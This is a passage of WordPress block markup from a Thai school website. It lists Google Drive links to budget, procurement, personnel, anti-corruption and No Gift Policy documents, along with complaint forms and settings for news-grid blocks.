gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 